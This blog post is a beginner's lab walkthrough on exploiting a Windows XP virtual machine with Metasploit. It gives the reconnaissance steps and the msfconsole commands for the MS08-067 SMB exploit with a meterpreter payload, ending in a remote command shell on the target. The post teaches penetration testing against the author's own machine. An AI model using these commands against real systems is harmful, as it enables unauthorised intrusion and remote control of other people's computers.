About Me

Saturday, January 28, 2012

How To Exploit Windows XP with Metasploit

Ok, in this session we will try to exploit Windows XP with Metasploit.
My victim is Windows XP that i've installed in my virtual box.
First step, we try to get an information about our victim with Zenmap or Nmap tools.

From the picture above i know if host with IP address 192.168.56.101 was use a system operation Windows.
Ok, now we try to connect to that IP address.

If that was connected, now open Nessus to scanning Vulnerability in that IP address.
After we scan, then open msfconsole.
msfconsole located in Apps -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> msfconsole

Next, type command use exploit/windows/smb/ms08_067_netapi
Then typed command set payload windows/meterpreter/bind_tcp
Next set our IP address with command set lhost <our ip address>
After that we set IP address our victims with command set rhost <ip address of our victims>

Ok, last typed command exploit
If succes, then that will apear something like picture below

Ok. Next session. we try to entry to command prompt in our victims.
Typed command execute -f cmd.exe -c -i 
Ok we have succes to exploit Windows XP.
Now we try to make some folder in drive C.
Try it with typed command mkdir <name of folder>
For example, i try to make folder tes , so i typed mkdir tes
Next we checked in Windows in virtual box. We check the folder that we have make before in drive C.


Well, the directory(folder) has been made. It means we have succeed to exploit that Windows XP. :D

No comments:

Post a Comment